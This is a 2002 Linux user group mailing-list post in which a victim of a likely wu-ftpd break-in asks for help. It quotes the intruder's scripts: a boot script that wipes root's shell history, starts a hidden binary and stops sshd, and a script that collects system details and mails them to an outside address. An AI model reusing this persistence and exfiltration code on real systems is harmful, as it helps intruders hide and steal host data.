[lug] i got hacked

j davis davis_compz at hotmail.com
Thu Apr 18 18:07:41 MDT 2002 

yahoo,
i got hacked and there sending info to a yahoo account.....ryz_ro at yahoo.com
look below....


>From: "j davis" <davis_compz at hotmail.com>
>Reply-To: lug at lug.boulder.co.us
>To: lug at lug.boulder.co.us
>Subject: [lug] i got hacked
>Date: Thu, 18 Apr 2002 21:44:09 +0000
>
>
>i have a box at a place i do contract work about 2 days a month.
>today i could not ssh to it. so iwent on site and discoverd i got
>hacked...like a dummy i didnt have tcp wrappers on or a firewall . i think
>they exploited wu-ftpd
>..i use redhat 7.1 with wu-ftpd 2.6.1-20...i havent got around to upgrading
>yet.
>anyway here is what i found in /etc/rc3.d/S52remote
>
>#!/bin/sh
>
>rm -rf /root/.bash_history
>ln -s /dev/null /root/.bash_history
>
>cd /dev
>./ryz -f ./s
>/etc/rc.d/init.d/sshd stop
>cd /
>
>/usr/bin/trimite
>
>then here is /usr/bin/trimite
>
>#!/bin/sh
>
>echo "* Info : $(uname -a)" >> /tmp/info
>echo "* Hostname : $(hostname -f)" >> /tmp/info
>echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> /tmp/info
>echo "* Uptime : $(uptime)" >> /tmp/info
>echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> /tmp/info
>echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> /tmp/info
>echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> /tmp/info
>echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> /tmp/info
>echo "* Spatiu Liber: $(df -h)" >> /tmp/info
>echo "* Ping la Yahoo: $(ping -c3 yahoo.com)" >> /tmp/info
>echo "* Password: $(wc /etc/passwd -l)" >> /tmp/info
>echo "* Portul rootkitului este 25897" >> /tmp/info
>cat /tmp/info | mail -s "root dupa reboot" ryz_ro at yahoo.com
>rm -f /tmp/info
>
>so, netstat says i have something listening on 25897...what should i do?!
>never benn hacked before....i already turned off ftp and turned on tcp
>wrappers.
>
>help please
>jd
>
>
>
>
>
>
>_________________________________________________________________
>Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp.
>
>_______________________________________________
>Web Page:  http://lug.boulder.co.us
>Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug




_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp.

More information about the LUG mailing list